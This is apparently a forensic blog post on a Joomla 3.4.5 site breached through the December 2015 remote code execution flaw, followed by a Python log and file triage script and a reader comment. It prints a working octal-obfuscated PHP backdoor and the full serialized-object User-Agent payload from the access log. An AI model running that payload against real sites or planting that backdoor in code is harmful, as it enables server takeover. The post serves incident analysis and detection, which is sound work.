Joomla CMS 3.4.5 hacked through RCE vulnerability
Monday - Jan 4th 2016 - (1 comment)

Got a request to investigate a hack on a website using Joomla CMS. Without having more information about the nature of the hack, I started to look for recently modified files and found a couple of them with interesting filenames:

-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/images/sampledata/fruitshop/sql_95.php
-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/components/com_users/cache_95.php
-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/components/com_search/views/search/cache_95.php
-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/modules/mod_footer/sql_952.php
-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/plugins/finder/categories/old_95.php

These files all contained obfuscated/encoded PHP code of the kind attackers typically upload and use after a compromise. Another very interesting find was this one:

-rw-r--r-- 1 www-data www-data 237 Dec 15 04:25 ./example.com/libraries/joomla/exporter.php

tail ./example.com/libraries/joomla/exporter.php
<?php if (md5($_POST['password']) == 'ee536041e2d1cab06fb46129549f13d2') { preg_replace("\043\056\052\043\145", "\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050'" . $_POST['code'] . "'\051\051\073", ''); } ?>

Decoded, the octal escapes in this file spell out a preg_replace() call with the deprecated /e modifier, which evaluates the base64-decoded content of the POST parameter "code" once the MD5 of the supplied password matches: a minimal password-protected backdoor. Interestingly this file was uploaded a couple of days before all the others, so I decided to focus on it. The access_log revealed an interesting GET followed by a POST:

- - [15/Dec/2015:04:24:25 +0100] "GET / HTTP/1.1" 503 4430 "http://example.com/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
- - [15/Dec/2015:04:25:00 +0100] "POST / HTTP/1.1" 503 4462 "http://example.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36"

Although the return code was 503, the hack still seems to have worked. The status code does not matter here: Joomla stores the User-Agent string in the session during the GET, and the serialized object embedded in it is unserialized when the session is loaded again on the following request, the POST, before any page content is rendered. Even more interesting is the fact that the POST went to Joomla itself, not to a previously uploaded file. A quick search revealed that there is a vulnerability in all Joomla versions prior to 3.4.6 that allows remote code execution (RCE). An exploit for this vulnerability was published on December 15th 2015 (see https://www.exploit-db.com/exploits/38977/), the same day the hack happened on this Joomla CMS. The vulnerability was fixed in Joomla 3.4.6, which was released a day prior to the hack - yet the CMS owner didn't react as fast, and one day later it was already too late.
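As an added example (not code from the original post), a small Python triage script that applies the two indicators from this write-up: it flags access_log lines whose Referer or User-Agent carries a serialized PHP object header, and it decodes octal-escaped PHP to spot the preg_replace /e, eval(base64_decode()) and md5 password-gate pattern seen in exporter.php. The log lines, the PHP sample and its hash are constructed.

```python
import re
# Constructed sample access_log lines (Apache combined format), not the post's own log:
# the first carries a serialized PHP object in the User-Agent, the second is benign.
SAMPLE_LOG = r'''203.0.113.5 - - [15/Dec/2015:04:24:25 +0100] "GET / HTTP/1.1" 503 4430 "http://example.com/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}}"
203.0.113.9 - - [15/Dec/2015:04:30:00 +0100] "GET /index.php HTTP/1.1" 200 8120 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36"'''

# Constructed PHP file in the style of the exporter.php above (the hash is a placeholder).
SAMPLE_PHP = r'''<?php if (md5($_POST['password']) == 'PLACEHOLDER_MD5_HASH') { preg_replace("\043\056\052\043\145", "\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050'" . $_POST['code'] . "'\051\051\073", ''); } ?>'''

# Combined log format; the two quoted trailing fields may contain backslash-escaped quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$')
# A PHP serialized-object header O:<len>:"<class>":<n>:{ never belongs in a Referer or User-Agent.
PHP_OBJECT_RE = re.compile(r'O:\d+:\\?"\w+\\?":\d+:\{')
# preg_replace() whose pattern carries the /e modifier: the replacement is executed as PHP (< 7.0).
PREG_E_RE = re.compile(r'''preg_replace\s*\(\s*(["'])([^\w\s\\]).*?\2([a-zA-Z]*e[a-zA-Z]*)\1''')

def suspicious_requests(log_text):
    """(ip, timestamp, field, request) for every line whose Referer or UA holds a PHP object."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("referer", "ua"):
            if PHP_OBJECT_RE.search(m.group(field)):
                hits.append((m.group("ip"), m.group("ts"), field, m.group("req")))
                break
    return hits

def decode_octal(source):
    """Expand PHP octal escapes ("\\145" -> "e") so obfuscated strings become greppable."""
    return re.sub(r'\\([0-7]{1,3})', lambda m: chr(int(m.group(1), 8)), source)

def backdoor_indicators(php_source):
    """List the backdoor traits present in a PHP file's contents (empty list = nothing found)."""
    decoded = decode_octal(php_source)
    found = []
    if PREG_E_RE.search(decoded):
        found.append("preg_replace with /e modifier")
    if re.search(r'eval\s*\(\s*base64_decode\s*\(', decoded):
        found.append("eval(base64_decode(...))")
    if re.search(r'md5\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\[', decoded):
        found.append("password gate on a request parameter")
    return found

if __name__ == "__main__":
    print(suspicious_requests(SAMPLE_LOG), backdoor_indicators(SAMPLE_PHP))
```

Point backdoor_indicators() at the contents of each recently modified .php file and suspicious_requests() at the full access_log to reproduce the triage done above on a whole site.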


Zbigniew from PL wrote on May 16th, 2016:
Hello, great find. On my client's site, via this file the hacker also uploaded an ORB shell to BqZeR.php in the domain root and a few other places.

